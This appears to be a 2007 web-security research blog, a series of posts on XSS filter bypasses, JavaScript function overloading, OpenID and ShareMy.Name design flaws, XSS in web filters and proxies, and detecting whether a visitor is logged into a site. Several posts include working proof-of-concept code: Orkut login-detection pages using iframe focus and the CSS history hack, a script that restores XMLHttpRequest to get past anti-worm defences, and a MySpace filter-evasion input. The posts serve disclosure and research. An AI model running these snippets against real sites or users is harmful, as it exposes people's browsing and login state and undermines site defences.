Tuesday, January 30, 2007

MySpace doesn't understand browsers (RCSR info)

You know what I hate? Advisories without enough info to verify a bug or PoC code. For example: http://www.info-svc.com/news/01-29-2007/myspace/ provides no information to anyone about what the nature of the issue is, or anything, it just says there is an issue, and of course once they do disclose something there is no proof that they did actually find something. And even more than that; I honestly don't care about people declaring that they've found security issues without giving specifics.

Anyway, I thought I'd go have a look myself, and here is a little snippet which works in both IE and Firefox;

<input type_="password" type=`password`>

Whether this is what Chapin Information Services found is unclear since they didn't release anything, but what is clear is that MySpace clearly understand the Non-Digit-Non-Alpha issue extends to all attributes, nor do they seem to understand that IE also allows grave accents (`) to be used instead of (single or double) quotes.

I really don't understand how many times they need to fix these issues before they begin to understand them.

Friday, January 26, 2007

A Month In Obscurity

Firstly, sorry about the lack of content in the last few days, I've been busy with yet another new paper/project, and life in general, so I haven't had a chance to write up my research and post it, and I don't see myself having much time to write something up this weekend, but come Monday or Tuesday I'll most likely start posting again.

But in the mean time, I thought I'd post some interesting but rather obscure things I've found on the internet. Obscure is being defined as not being mentioned on ha.ckers, so a lot of people might know a lot of these, but I think that most people won't know all of them. Oh, and this isn't strictly content from January, it primarily is, but anything interesting I found lately and thought most people wouldn't know about is link worthy. If you think you know anything else, please write a comment or something.

.NET Framework bug and XSS by xknown.

Essentially, xknown found out that when .NET pages use the Response.Redirect, the function does not check whether or not the URL provided is a URL which you can redirect to using the location header, and so it is possible to send a javascript: URI which the page will attempt to redirect you to and fail, but it will then print it out on the page like so:

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="javascript:alert('XSS')">here</a>.</h2>
</body></html>


And if the user clicks on the link, they will execute your JS. Of course data: and similar URIs can also be used.

Anti-DNS Socket Pinning + Flash by Kanatoko.

With Anti-DNS Pinning, we can break the same-origin policy.
Not only JavaScript, but also FLASH and Java Applet are affected.

FLASH has the Socket class in the new version of FLASH Player ( version 9.0 or higher, ActionScript 3.0 ).

--Quoted from the documentation--
The Socket class enables ActionScript code to make socket connections and to read and write raw binary data.
The Socket class is useful for working with servers that use binary protocols.
----


Month of Apple Fixes by Landon Fuller.

I think the title is pretty self-explanatory here, and while I didn't think this was really worth a mention here, I thought I might as well chuck it in here, since not everyone keeps on top of these things.

Cross-Domain POST Redirection by Ilia Alshanetsky.

Not exactly new research, but something most people don't know about, I wonder if phishers will start using this instead of MITM phishing kits which generated so much pointless publicity.

Digg This - Blog Security Vulnerabilities Found by Harry Maugans.

Harry found a bug in the Digg This wordpress plugin that blindly assumed that the first hit to come to a page from digg must be coming from the link to the submitted story, and so a spammer can easily get people digg their own articles instead of the articles posted on a blog. Great find by Harry, and great ingenuity by the spammers IMO.

Uninformed Issue 6 Was Released

Uninformed is a technical outlet for research in areas pertaining to security technologies, reverse engineering, and lowlevel programming. The goal, as the name implies, is to act as a medium for informing the uninformed. The research presented here is simply an example of the evolutionary thought that affects all academic and professional disciplines.


Its articles are of impecable quality, so I say everyone with even a cursory interest in low level programming or similar should check it out.

Tricking forums about image size (Animated GIFs) Analysis by Captbox, image example supplied by Xoferif.

What Captbox was able to find out from the image Xoferif provided was that while GIF images do have global size data, in animated GIFs, that size data is ignored in favor of frame size data, and since most (probably all) forums only check the global size data, we are able to supply images of any size no matter what restrictions are placed on us.

New SQL Truncation Attacks And How To Avoid Them by Bala Neerumalla.

This one is a bit hard to explain, so I say you should just go read the article, it'll definately be worth your time.

MySpace's "Domain Generalisation" Vulnerability by trev.

trev found a way to exploit MySpace's domain generalisation (which exists so that all the myspace subdomains can interact via Javascript) using the fact that the domain names we enter are not full names, but only partial names, because full names end in a dot, signalling that the .com address is a subsidary of the root address, rather than some other address, anyway, its an interesting thread - you should read it.

Fake AP by Black Alchemy.

This is a fairly old project, which I only found out about a week ago, and while its not revolutionary or anything, I thought it was interesting enough to tell people about. It also showcases the huge difference between web and network security (try to come up with a situation in web security where hiding in misinformation/plain sight was ever possible - if you think of something; email me).

And those are the interesting links I've found in the last month which the other blogs I linked to haven't (to my knowledge) covered.

Wednesday, January 24, 2007

defy.js

Well, I was kinda bored this morning and had the (very questionably) great idea of writing a snippet of code to delete all Javascript overloading, and reinstate the XMLHttpRequest Object:

function extractXHR () {
    var iframe = document.createElement('iframe');
    iframe.name='test';
    iframe.src='http://www.google.com/';
    iframe.style.display = 'none';
    document.body.appendChild(iframe);
    window.XMLHttpRequest= window.frames.test.XMLHttpRequest;
    document.body.removeChild(iframe);
}

function recursive_delete (object) {
    var failed;
    for (obj in object) {
        failed = 0;

        try {
            delete window[obj];
        } catch (e) {
            failed = 1;
        }

        if (failed = 0) {
            try {
                recursive_delete (window[obj]);
            } catch (e){

            }

        }
    }
};

recursive_delete (window);
recursive_delete (document);
extractXHR();


The other thing I could have done would be a recursive_extract function, which tried to extract everything from the window object of the iframe, but not everything is enumerable (e.g. XMLHttpRequest is not enumerable), so customized code could still possibly be needed.

Also, the way reason the extraction works is because it executes before the page can fully load, and this causes the originating domain policy to not have kicked in yet, and so we can still get the window object. its probably not the same object as the one the page uses in the end though, but I think I might check it out.

Essentially what that means for an attacker is that there is a tiny chance that it won't work if the page is set up between the two Javascript instructions which append the iframe and extract the XMLHttpRequest object.

Tuesday, January 23, 2007

More Javascript Overloading

Well, as I mentioned in my last post, Jeremiah's idea of masking functions works quite well, but I left out the fact that it only works for the window object, so things like document.write() are still safe because document cannot be masked. try it:

javascript:function document() {};

And you get the error Error: redeclaration of const document.

As you can see, while I do call it masking when you override XMLHttpRequest by creating a function of the same name, it is really just redeclaring it inside the window context.

So its effectively impossible to stop people writing to the document, and therefore creating an iframe and using it's XMLHttpRequest object.

Now, thanks to Mook from irc.mozilla.org #js I've also found out that for everything other than XMLHttpRequest that you can over-write there also seems to be a property in window.__proto__ that does the same thing. Conveniently enough you can also create a function called __proto__ which blocks it.

Also, just some assorted things about Javascript which I mentioned in previous articles I want to mention:

When the submit() method gets replaced by a form element of the same name, you can still access it via the form.__proto__.submit() function, again; Thanks Mook.

Redeclaring Javascript Properties

Ok, so the title of this was originally "Don't we have memories for a reason?", and had a bit of a rant here, but I decided the rant part was a bit unwarranted and stupid (exceptionally stupid, really), so I've removed it so I don't subject anyone else to that crap. Anyway, on with the post:

Jeremiah Grossman (who does some great work, actually), had the idea to stop XSS Worms by denying them access to some crucial functions like XMLHttpRequest() and createElement. You can read the whole post here: http://jeremiahgrossman.blogspot.com/2007/01/preventing-csrf-when-vulnerable-to-xss.html.

Now while I don't think people have attempted to do exactly that before, there were efforts to do the same thing to deny attackers access to cookies a while back, which used the same techniques which it turned out could be easily subverted. Now this isn't my rant, things happen and people might not know about what has happened before, fair enough.

But when people who know about what happened before and that it can be overwritten start saying that Jeremiah's idea works you've really got to wonder why we have memories if we don't use them.

Oh, and here's some code to prove my point: (check your error console to see there are no errors, and the appropriate functions are being called)

javascript:window.__defineGetter__("open", function() { }); delete window.open; window.open("http://kuza55.blogspot.com/",null,"");

javascript:document.createElement = function () {}; delete document.createElement; var bold = document.createElement('b'); bold.innerHtml = 'createElement Works'; document.body.appendChild(bold);

javascript:document.__defineGetter__("write", function() { }); delete document.write; document.write('document.write works');

I also found it humorous that someone was recommending using delete to remove the window element so that people could not call the function, instead of overwriting it.

Ok, now onto some more interesting things. The idea that Jeremiah Proposed for getting rid of the XMLHttpRequest() object was quite a good one, because whenever we try to delete a function it doesn't work, we CANNOT delete functions; it seems you can only delete objects and properties.

The documentation for the delete operator can be found here, it doesn't mention why we can't (or how to) delete functions though: http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Guide:Operators:Special_Operators#delete

So essentially that definitely works, so good job on coming up with that. Well, untill someone else figures out a way past that as well.

But there are some fun things you can do like the following:

<html>
<body>

<script>
function XMLHttpRequest() { }
</script>

<iframe name='test' id='test' src='http://www.google.com/'></iframe>

<script>
var req = new window.frames.test.XMLHttpRequest();
alert(req);
</script>

</body>
</html>


So if we can somehow create an iframe, with a name, we can circumvent it. We could also use an iframe created by advertising code, but that is limited by the fact that we would need to use window.frames, and the only things which you can't replace with functions are window, document, and possibly some other constants I can't remember right now.

Disclaimer: I'm not saying that anyone who I've mentioned does bad work (and even when I was ranting, I wasn't saying that), but seriously, you were told about something once, do you need to be told again?

Monday, January 22, 2007

Picking Brains With...Me; Brains Are Tasty

Well, Jungsonn started a series of "interviews with hackers, admins, programmers and other people from the security field. They are given a set of questions to answer." entitled "Picking Brains With..." today, and it seems like I've been his first target, so if anyone is interested, you can find if here: http://www.jungsonnstudios.com/blog/?i=76&bin=1001100

And while I obviously don't find it all that interesting reading things I wrote about myself, I'm definately quite eager to see who else he convinces to answer his questions, and their responses.

Oh, and like I said; I'd really like to hear from anyone who wants to be a "hacker". I really want to know why you want to be a "hacker". What's so special about the word hacker that lures you?

ShareMy.Name Design Issues

I've just posted a little article about some things that I think are currently wrong with OpenID implementations, so I thought it would be only fair to give the same treatment to ShareMy.Name - which admitedly isn't a SSO (Single Sign On) service, but it does provide a facility for easily giving out your data to everyone.

First of all though, I'll give you some history of what I've personally seen. ShareMy.Name seems to have gone through several different phases from where they simply acted as a username/password and personal details depository so that other sites didn't and so you would have to provide the same username and password to all sites, and a malicious (or hacked) site could get all your details, to where you needed to enter a regenerating accesskey (sort of like those two-factor ID things) to the current state where you get an accesskey assigned to you when you sign up, and send that key (supposedly) to ShareMy.Namen where if the accesskey matches an account, it asks you if you want to send the data the site has asked for back.

You can see a demo here: http://sharemy.name/test_sendback/

They also give you a Javascript Bookmarklet which looks something like this:
javascript:document.cookie='accesskey=aNwluiUMqk;path=/';
function r(){
document.forms['sharemyname'].accesskey.value='aNwluiUMqk';
document.forms['sharemyname'].action='http://sharemy.name/sendback/';
document.forms['sharemyname'].submit();
}
if(document.forms['sharemyname']) r(); else alert('We tried everything, your going to have to enter aNwluiUMqk manually; or, they do not support ShareMy.Name.');


Which tries to send the request to Share.MyName so that you can verify whether or not you want to send certain details to the site.

For the moment lets ignore the fact that you could just ask the user to input their accesskey in a form, and they would readily do it, or the fact that every site gets sent the accesskey, and assume that the bookmarklet is the only way to get the data, and the accesskey is not sent back.

They give us the accesskey (when they set the cookie) no matter if the user agrees to give it to us on the sharemy.name page.

But ignoring the fact that we are given the accesskey initially (this is an easy fix with no real ramifications - what is harder to fix is people overloading and subverting the page in such a way that the bookmarklet fails in its job), and the fact that users are encouraged to enter their accesskeys into unknown forms ('We tried everything, your going to have to enter aNwluiUMqk manually; or, they do not support ShareMy.Name.'), there is still the problem that the site is sent the accesskey by default.

This is a problem, because when the user say gives the their First Name, Interests, and Accesskey, they are essentially giving the site all of their information, because there is no additional identification required to get information about the person other than the accesskey.

And even more than that, since the key is permanent (from what I've seen) they have access to your data indefinately.

Now I realise that this could all be fixed simply by requiring the user to be logged into their account when agreeing to share details, but I think without an expose on the ramifications of their current design, nothing will change. And its fun to write about the havoc one can wreak.

I won, I won, I won.....

I won a book! Anyway, yesterday I remembered the contests Sploitcast runs, and went and had a look at the one they'd released last friday, and to my surprise found the one that had been released on the day I'd gone canoeing hadn't been solved, a couple of hours later: http://www.sploitcast.com/ (Scroll down to the News Section) I solved the challenge (by finding a copy of purchase_report.txt), and it seems I was the first. So now I get a free Syngress Publishing book.

I chose to get RFID Security by Frank Thornton, Brad Haines and John Kleinschmidt, which should be interesting once it gets shipped out to me.

If anyone is bored, I suggest they go try out the challenge (even though you won't win anything), its an interesting one.

Oh, and if anyone is subscribed to the RSS feed (I think there are a very small few) and you don't want to read about crap like this, just subscribe to the "Security (All)" feed, which won't contain anything other than security articles.

Sunday, January 21, 2007

Insecure OpenID 'Features'

Note: I wrote this a while ago, and I haven't gone over it completely, but I thought it would be worth posting about.

I read about OpenID a while ago, when my friend asked me what I thought of it from a security perspective, and from what I could tell from the documentation, except for DNS issues it wasn't a bad decentralized authentication protocol. And I didn't do any further research into it until I came a blog entry describing how it worked in practice http://www.readwriteweb.com/archives/openid_vs_bigco.php).

In that article/flash 'demo' I saw that as with any protocol, developers can come up with great 'features' which damage the security of the protocol. And this isn't one OpenID provider deciding to add an insecure feature, either, it is one that is common throughout the 3 OpenID providers mentioned in the article, which I assume are the most popular ones being used (why else would a blogger mention them?).

Now, what is this feature I feel should not exist? It is the feature to set a site to be able to accept your credentials without you having to enter your OpenID password, and since your OpenID provider does not provide these details to the host, they do

Of course, you still need to be logged into your OpenID provider, but since you're meant to be using this login for several sites, its not too much of a stretch to believe that you're going to be logged in all the time you're online - which is quite a large time frame. And if we consider that most sites will these days tell other users when a person is online, or allow you to reveal that fact yourself via posting comments, photos, etc, its not too difficult.

But enough about the feature itself; what does it mean to us? This means that an attacker can log you into any site you decided to trust via CSRF attacks because the site cannot tell if you've entered a password. Now this might not seem important, but it is very important for both large and targeted attacks because the user no longer needs to be logged into the service you want to attack, but merely logged into the central service.

Even worse, this fact is completely misrepresented to users. The questions that are posed essentially revolve around whether you trust the site that wants to verify your identity, and whether or not your OpenID provider should always verify your identity to this source, so even if a user is generally cautious about these kind of things, if something like an email provider started using this a user would be more likely to trust the site, and cause security issues. Essentially the more critical the information you are accessing the more likely to trust the site you are trying to access, and so the more critical sites are the ones which will have issues with this; lets just hope they don't use OpenID though, because leaving DNS security, essentially up to your users, is as about the worst idea anyone could come up with, but that's another rant altogether.

For reference, the 3 OpenID providers I tested were:

http://www.myopenid.com/ where users are asked if they want to allow the site they want to log into to be able to verify their identity, and the insecure answer is "Allow Forever"

http://www.claimid.com/ where users are asked if they want to log into a site, and the insecure answer is "Login and Trust"

http://www.videntity.org/ where users are asked if they trust the remote site with their identity, and the insecure answer is "Yes, and don't ask me Again"

Another insecure 'feature' is the lack of need to enter a password to register for a site. Out of those 3 OpenID vendors, only http://www.claimid.com/ asked users for a password when registering for a site, the other two had only CSRF protections. This is admittedly not particularly serious because you still need an XSS (or similar) flaw in the OpenID provider's site before you can take advantage of the design idea, but it is rather worrying that people designing secure systems don't seem to want to implement defence in depth.

Detecting Javascript .focus() in iframes to Detect Logged In Status (IE only)

I've been playing around with a lot of ways to detect if users are logged in, but I haven't published many of them so here's yet another way to detect if users are logged in.

One thing many sites (google sites in this example) do is use the Object.focus() method to set the focus to a login form.

And in IE; if the object getting focused on is in an iframe, the iframe also gets focused on, which is an event which we can easily detect, so if we have an iframe to which there is no way a user can themselves set the focus to, and it gains focus, this should tell us that the content of the iframe set the focus to something, and the user is therefore not logged in, if after a few seconds of it being loaded but not gaining focus we can very safely assume it didn't try to, and the user is therefore logged in.

Here's a quick PoC for Orkut:

<html>
<body>
<script>
var logged = true;
function check () {
    if (logged == true) {
        alert('You ARE logged into orkut');
    }
}
</script>
<iframe src="https://www.orkut.com/News.aspx" onFocus="if (logged == true) { alert('You are NOT logged into Orkut.'); logged = false;}" onLoad="window.setTimeout ('check()', 1000);" width=0 height=0></iframe>
</body>
</html>

On Stefan Esser's CSRF Protection Idea

A while ago I read a post entitled CSRF protections are not doomed by XSS by Stefan Esser which proposed an interesting method of using domain boundaries to stop an XSS hole in the main domain being used to extract form tokens and circumvent CSRF protections, and it would even go so far as being able to stop an XSS vuln in one form being able to circumvent the CSRF protections of another.

And even if it is more difficult to implement than simple token protections, it is still feasible if you use a wildcard DNS entry, and have a check on each form which checks if the $_SERVER['HTTP_HOST'] is the appropriate one, and if not then redirect to the appropriate one.

And I was even going to implement an example, until I realised one simple flaw; its all still hosted on the same server, and the only thing separating it is the HTTP Host header which can easily be forged via XMLHttpRequest or FlashRequest, so this protection can easily be beaten.

Which got me thinking; what would you need to add for it to work as intended? Well, you could put all the forms on separate servers, but that doesn't seem at all practical, the only really viable solution is to add more authentication mechanisms which are readable only by the specific subdomain and no others.

And thats really the biggest issue - you have to create an extra session key for every single form you have on your site, and set a cookie for them, and they all have to be set at login, and can never be regenerated because XMLHttpRequest and (possibly) FlashRequest can read response headers and extract the cookies being set on subdomains.

So while it is still of course possible to implement this, it seems completely impractical to create yet another session id which the server has to keep track of for every single form.

But if anyone has actually implemented something similar to this in any environment I'd really love to hear about it.

Saturday, January 20, 2007

XSS-ing Web Middleware

A while ago I stumbled upon some XSS vulnerabilities in some Web Filtering Software (namely Websense and Surfwall), and it got me thinking that these applications along with other Web middleware could be as damaging (if not more so) to the end user as an XSS hole in the middleware would affect all sites used through the middleware.

What is Middleware?



But what kind of middleware exists on the web? Right now I can only think of two different types; web filters, and web proxies. Lets have a quick think about how these two pieces of software are different from an attacker's point of view.
With a web filter, the software exists on every single domain which has 'objectionable' content, and when we XSS it through a web filter, we are still attacking the original domain.

Web proxies on the other hand are very different though because web proxies only exist on their domain, but everything goes through them, so while most web proxies store the cookies on their server (so a direct XSS attack will not yield authentication cookies for other sites), if you can steal the web proxy's cookies, you are essentially logged into everywhere the user is.Sadly you don't know where that is, and you need to find out.

XSS-ing Web Filters


Firstly, lets assume we've found an XSS flaw in some filtering software, and from what I've seen (http://www.jungsonnstudios.com/blog/?i=28&bin=11100 ; http://sla.ckers.org/forum/read.php?3,44,4640#msg-4640) Its not too big an assumption.

The next question, is what conditions do we need to meet for an attack to work? Well, obviously we need to have the web filter become activated on the site (in the sense that it does block pages from that site), but most importantly of all we need the web filter to display error messages on the domains it is blocking, rather than on a central domain.

Another useful (but not essential) condition is to have the site only partially blocked so that the user can be already logged into the domain you want to attack.

Essentially this means that content based web filters (e.g. ones which search for meta tags, titles, keywords, etc), are better targets than those which block sites on a per domain, block list basis because those that are completely blocked won't have users logged into them and so attacks against them need to be completely different.

Why? Because if you block a whole domain, then an XSS hole in it won't allow you to steal login credentials because the user isn't logged in. On the other hand if a domain isn't blocked in a blocklist, then we can't execute an attack. But if a domain isn't blocked in a content based web filter it may still be possible to get it to be blocked by injecting restricted keywords into a page. So even if a page is not blocked, you can inject some keywords into a search string, and have it block the page.

The one thing that I have been able to come up with though is simply replacing the whole page that is blocked. Lets say www.sharetrading.com is blocked because a company doesn't want its employees using work time for checking on their shares and the whole domain is blocked, but you have an XSS hole in the blocking page. From there you can easily inject some Javascript which would overwrite the page blocked message and replace it with what the user expects and simply collect login details.

Sadly though both of the vulnerabilities that Luny and Jungsonn have found exist on a central server. So while there are currently no vulnerabilities that I know of that satisfy these conditions, it is important to keep in mind that every layer you add which can possibly add content is vulnerable.

XSS-ing Web Proxies


Like I mentioned above; web proxies are really the polar opposite of web filters because they exist on one domain showing content from all domains rather than showing the 'same' content on all domains. But these are a dime a dozen and vulnerabilities should exist by the bucket load.

And they do; because they have an enormous task set for them; they must not only remove all Javascript, but they have to keep content as much intact as possible, and so they often even go as far as allowing Javascript and try to rewrite it so that its safe. There's really no way of locking these down without destroying so much functionality its not funny, its like surfing without Javascript, except with some potential holes around the setting.

For the ones which try to remove Javascript completely - well, its just another XSS filter, it shouldn't be much of an issue to defeat.

For the ones which try to rewrite it there is some really interesting stuff I want to talk about. The example I'll be talking about is http://the-cloak.com/. It has the added feature that it rewrites Javascript so that it executes almost like its on its on the actual domain, to do this it replaces all instances of document.cookie and similar properties with TC_document_cookie and similar, which contain the variables from the site which the-cloak.com is proxying. It is of course trivial to break past this by using some simple javascript tricks like this:

var test = document;
alert(test.cookie);


But even more interesting is the realisation that there is (of course) no same domain origin policy in force here so you have unrestricted access to all the cookies for every domain, and you can just use an iframe to load the proxied domain you want to attack, and then simply read the TC_document_cookie variable out of the iframe.

For those that don't spit the cookies out anywhere; keep in mind that all XSS attacks are nothing more than a means to an end and being able to steal the cookies for the web proxy is just as useful.

Conclusion


As we can see XSS is something that may end up concerning more people than just web app developers, anyone who develops apps which interact with the web will have to make sure that their products don't add extra vulnerabilities to a user's set up.

Ok, so I haven't really said anything ground breaking, but its something that wasn't being said anywhere else that I could see, so I thought I'd write about it, even if it is partially theoretical.

Also; if anyone can think of any more middleware which exists on the net; please, write a comment, send me an e-mail, or get in touch in some other way, I'd love to hear about more things which can potentially make the web a more dangerous place. In fact I'm willing to hear about any applications which somehow influence what the browser renders no matter where they are.

More content coming soon

I've just gotten back from an 8 day canoeing trip with some friends, where I realised that I have so many ideas, PoCs, papers and similar things which are just lying around and not being discussed or published by anyone else, so in a rare attempt at conscientiousness I'm going to try and publish at least one article a day for the next week - hopefully it'll work and I won't give up too soon. So look forward to seeing some new (and hopefully interesting content) soon.

Monday, January 01, 2007

More Logged In User Detection via Authenticated Redirects

Ok, so what's changed since the 30th when I posted about this under a different name (Semi-Open Redirects), well, I thought of a better name and some new ways to exploit Authenticated Redirects.

Authenticated redirects should be self-explanatory, but essentially I just mean redirects which don't redirect you if you aren't logged on (or ones which redirect you only if you aren't logged on, but its a good enough name for me anyway).

Now, in my post about Semi-Open redirects, one of the constraints I hadn't thought of a circumvention for was the need to have an open redirect, so you could control where it redirects.

Since then I've realised that its not always necessary to control where the redirect sends users. Because we can already check if a user has visited a page through the CSS history hack!

Some common types of authenticated redirects which you can find on the internet are download pages which you need to login to view, which use redirects to track how many people are getting sent to each download or other link.

But anyway, these redirects are abundant, so here's the source to a working PoC for Orkut:
<html>
<body>
<script type="text/javascript">
    function iframe_callback() {
        if(temp.offsetHeight==1){
            alert('You are NOT logged into Orkut.');
        } else {
            alert('You ARE logged into Orkut.');
        }
        c.removeChild (temp);
        document.body.removeChild(orkut_iframe);
    }

    document.write( '<style type="text/css">#nicked a:link{color:#fff;}' );
    document.write( '#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}' );
    document.write( '#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>' );
    var c = document.createElement('div');
    c.id='nicked';
    document.body.appendChild(c)
    
    var visited = true;
    var temp = document.createElement('a');;
    temp.innerHTML = 'test';
    c.appendChild(temp);
    var random, link;
    
    while (visited == true) {
    
        random=Math.floor(Math.random()*1000000);
        link = 'https://www.orkut.com/GLogin.aspx?done=https%3A%2F%2Fwww.orkut.com%2FNews.aspx%3Ftest%3D' + random;
    
        temp.href=link;
        if(temp.offsetHeight!=1){
            visited = false;
        }
    }
        
    var orkut_iframe = document.createElement('iframe');
    orkut_iframe.src = 'https://www.orkut.com/News.aspx?test=' + random;
    orkut_iframe.style.display = 'none';
    orkut_iframe.onload = iframe_callback;
    document.body.appendChild(orkut_iframe);
    
</script>
</body>
</html>


Note: This PoC works on the principal that Orkut redirects you to a login page with the URL of where you wanted to go in the URL, and so we create URL with a random number appended to the URL, and then we see if you were redirected to the login URL.

Oh, and credit to Christian Heilmann whose CSS detecting code I essentially stole, because he was the first one smart enough to get it working in all browsers and post the working version in a comment on Jeremiah's blog. If anyone is interested I ripped the code from here: http://icant.co.uk/sandbox/nickhistory.html